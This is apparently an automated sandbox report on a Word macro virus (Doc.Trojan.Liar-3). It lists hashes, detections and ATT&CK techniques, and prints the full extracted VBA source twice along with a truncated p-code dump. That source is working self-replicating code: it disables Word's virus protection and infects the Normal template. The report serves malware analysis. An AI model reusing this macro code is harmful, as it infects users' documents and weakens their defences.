Office (OLE) malware analysis — malicious · 1dd69ef0297ab33a

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-06-24 20:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: beaff49efa09ec532bf8487488924bfb SHA-1: ff499cb1e7666f23608056843d612d99f0855524 SHA-256: 1dd69ef0297ab33aab46375a9cc77c4c6b744ea830a9136288c82fca61d18179

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Liar-3'. It contains VBA macros, including a 'Document_Open' macro, which is a common technique for executing malicious code upon opening the document. The script appears to be obfuscated and uses a polymorphic engine, suggesting an attempt to evade detection and download further payloads.

Heuristics 3

ClamAV: Doc.Trojan.Liar-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Liar-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6758 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6758 bytes
SHA-256: `5bf7bac0f6b0a0ff239e62c6f473ad6d7824030aec809ab23a2ce0f23d044de7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub document_open() ' Dim v(150): v(1) = "bliem by j2f": Options.VirusProtection = False ' Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) ' Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) ' Set nh = s.VBProject.VBComponents(1).CodeModule ' For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y ' vc = "Sub document_close()" & t & vx & vbCr ' If MacroContainer = NormalTemplate Then ' Set s = ActiveDocument ' Set nh = s.VBProject.VBComponents(1).CodeModule ' vc = "Sub document_open()" & t & vx & vbCr ' End If: Randomize: lin = abc.countoflines ' For i = 2 To lin ' jc = "" ' d = Int(Rnd * 3) ' p = InStr(abc.Lines(i, 1), t) ' If p = 0 Then GoTo e_ ' If p = 2 And lin > 100 Then ' v(i) = "": d = 1: GoTo n_ ' End If ' v(i) = Left(abc.Lines(i, 1), (p - 1)) ' For j = 1 To Int(75 - (Rnd * 20)) ' jc = jc & Chr(255 - Int(Rnd * 100)) ' Next j ' v(i) = v(i) & t & jc ' If d = 2 Then v(i) = v(i) & vbCr & Chr(32) & t & jc ' vc = vc & v(i) & vbCr ' n_: ' Next i ' e_: ' If nh.countoflines < 2 Then ' nh.AddFromString vc ' s.Save ' End If ' End Sub ' Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] ' Rem Uses "bliem" polymorhic engine by Jack Twoflower ' ' Processing file: /opt/analyzer/scan_staging/b670258e33f8450dad57214c5b90a929.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8828 bytes ' Line #0: ' FuncDefn (Sub document_open()) ' QuoteRem 0x0014 0x0000 "" ' Line #1: ' Dim ' OptionBase ' LitDI2 0x0096 ' VarDefn v ' BoS 0x0000 ' LitStr 0x000C "bliem by j2f" ' LitDI2 0x0001 ' ArgsSt v 0x0001 ' BoS 0x0000 ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' QuoteRem 0x0043 0x0000 "" ' Line #2: ' SetStmt ' Ld MacroContainer ' MemLd VBProject ' Set a ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld a ' ArgsMemLd VBComponents 0x0001 ' Set ab ' QuoteRem 0x003D 0x0000 "" ' Line #3: ' SetStmt ' Ld ab ' MemLd CodeModule ' Set abc ' BoS 0x0000 ' SetStmt ' Ld NormalTemplate ' Set s ' BoS 0x0000 ' LitDI2 0x0027 ' ArgsLd Chr 0x0001 ' St t ' QuoteRem 0x003D 0x0000 "" ' Line #4: ' SetStmt ' LitDI2 0x0001 ' Ld s ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set nh ' QuoteRem 0x0030 0x0000 "" ' Line #5: ' StartForVariable ' Ld y ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x004B ' Ld Rnd ' LitDI2 0x0014 ' Mul ' Paren ' Sub ' FnInt ' For ' BoS 0x0000 ' Ld vx ' LitDI2 0x00FF ' Ld Rnd ' LitDI2 0x0064 ' Mul ' FnInt ' Sub ' ArgsLd Chr 0x0001 ' Concat ' St vx ' BoS 0x0000 ' StartForVariable ' Ld y ' EndForVariable ' NextVar ' QuoteRem 0x004F 0x0000 "" ' Line #6: ' LitStr 0x0014 "Sub document_close()" ' Ld t ' Concat ' Ld vx ' Concat ' Ld vbCr ' Concat ' St vc ' QuoteRem 0x002C 0x0000 "" ' Line #7: ' Ld MacroContainer ' Ld NormalTemplate ' Eq ' IfBlock ' QuoteRem 0x0028 0x0000 "" ' Line #8: ' SetStmt ' Ld ActiveDocument ' Set s ' QuoteRem 0x0017 0x0000 "" ' Line #9: ' SetStmt ' LitDI2 0x0001 ' Ld s ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set nh ' QuoteRem 0x0030 0x0000 "" ' Line #10: ' LitStr 0x0013 "Sub document_open()" ' Ld t ' Concat ' Ld vx ' Concat ' Ld vbCr ' Concat ' St vc ' QuoteRem 0x002B 0x0000 "" ' Line #11: ' EndIfBlock ' BoS 0x0000 ' ArgsCall Read 0x0000 ' BoS 0x0000 ' Ld abc ' MemLd countoflines ' St lin ' QuoteRem 0x002A 0x0000 "" ' Line #12: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0002 ' Ld lin ' For ' QuoteRem 0x0011 0x0000 "" ' Line #13: ' LitStr 0x0000 "" ' St jc ' QuoteRem 0x0008 0x0000 "" ' Line #14: ' Ld Rnd ' L ... (truncated)

SHA-256: 5bf7bac0f6b0a0ff239e62c6f473ad6d7824030aec809ab23a2ce0f23d044de7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open() '
Dim v(150): v(1) = "bliem by j2f": Options.VirusProtection = False '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vc = "Sub document_close()" & t & vx & vbCr '
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument '
Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Sub document_open()" & t & vx & vbCr '
End If: Randomize: lin = abc.countoflines '
For i = 2 To lin '
jc = "" '
d = Int(Rnd * 3) '
p = InStr(abc.Lines(i, 1), t) '
If p = 0 Then GoTo e_ '
If p = 2 And lin > 100 Then '
v(i) = "": d = 1: GoTo n_ '
End If '
v(i) = Left(abc.Lines(i, 1), (p - 1)) '
For j = 1 To Int(75 - (Rnd * 20))  '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & Chr(32) & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
If nh.countoflines < 2 Then '
nh.AddFromString vc '
s.Save '
End If '
End Sub '
Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by Jack Twoflower '

' Processing file: /opt/analyzer/scan_staging/b670258e33f8450dad57214c5b90a929.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8828 bytes
' Line #0:
' 	FuncDefn (Sub document_open())
' 	QuoteRem 0x0014 0x0000 ""
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0096 
' 	VarDefn v
' 	BoS 0x0000 
' 	LitStr 0x000C "bliem by j2f"
' 	LitDI2 0x0001 
' 	ArgsSt v 0x0001 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0043 0x0000 ""
' Line #2:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set a 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set ab 
' 	QuoteRem 0x003D 0x0000 ""
' Line #3:
' 	SetStmt 
' 	Ld ab 
' 	MemLd CodeModule 
' 	Set abc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set s 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St t 
' 	QuoteRem 0x003D 0x0000 ""
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #5:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x004B 
' 	Ld Rnd 
' 	LitDI2 0x0014 
' 	Mul 
' 	Paren 
' 	Sub 
' 	FnInt 
' 	For 
' 	BoS 0x0000 
' 	Ld vx 
' 	LitDI2 0x00FF 
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St vx 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' 	QuoteRem 0x004F 0x0000 ""
' Line #6:
' 	LitStr 0x0014 "Sub document_close()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x002C 0x0000 ""
' Line #7:
' 	Ld MacroContainer 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' 	QuoteRem 0x0028 0x0000 ""
' Line #8:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set s 
' 	QuoteRem 0x0017 0x0000 ""
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #10:
' 	LitStr 0x0013 "Sub document_open()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x002B 0x0000 ""
' Line #11:
' 	EndIfBlock 
' 	BoS 0x0000 
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	Ld abc 
' 	MemLd countoflines 
' 	St lin 
' 	QuoteRem 0x002A 0x0000 ""
' Line #12:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld lin 
' 	For 
' 	QuoteRem 0x0011 0x0000 ""
' Line #13:
' 	LitStr 0x0000 ""
' 	St jc 
' 	QuoteRem 0x0008 0x0000 ""
' Line #14:
' 	Ld Rnd 
' 	L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.